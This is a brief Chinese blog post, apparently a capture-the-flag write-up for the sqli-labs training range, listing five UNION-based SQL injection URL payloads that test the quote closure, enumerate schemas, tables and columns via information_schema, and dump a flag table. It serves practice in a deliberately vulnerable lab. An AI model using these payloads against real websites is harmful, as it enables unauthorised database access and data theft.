Buuctf | sqli-labs
2024-09-05 00:41:40
这个是赵师傅给我们提供的训练靶场,最好都打一遍,但是出于找flag的角度,特此记录一下,flag在哪里【没错,我就是喜欢我的蓝变红,哈】
?id=1' :报错,说明就是用这个闭合的
?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+
?id=0' union select 1,2,group_concat(flag) from ctftraining.flag--+
最新文章
- 【Oracle】dba_jobs字段说明
- Rails学习笔记二
- Java-面向对象基础练习
- 学习使用 jQuery &; CSS3 制作照片堆栈效果
- mysql主主复制(双主复制)配置步骤
- ASPNET服务端控件练习(一个机试题)
- LINQ标准查询操作符(二)——Join、GroupJoin、GroupBy、Concat、
- 【Mood-12】Android开发相关书籍推荐
- 使用DrawerLayout实现QQ5.0侧拉菜单效果
- 炼狱—Bug集中营
- (正则表达式应用) 替换自闭合标签(self-closing tag)的method
- UVA - 10574 Counting Rectangles
- Unity该插件NGUI得知(9)—— Tween并转换成世界坐标系的大小NGUI尺寸
- Unity编程标准导引-3.2 MonoBehavior 组件父类重构
- 关于echarts 报错 初始化对象未定义
- PCI9054 总结(讲解非常清楚)
- 洛谷3704 [SDOI2017] 数字表格 【莫比乌斯反演】
- baiduTemplate.js 百度JS模板引擎
- 查看Windows端口及端口关闭方法
- 数据驱动测试二:使用TestNG和CSV文件进行数据驱动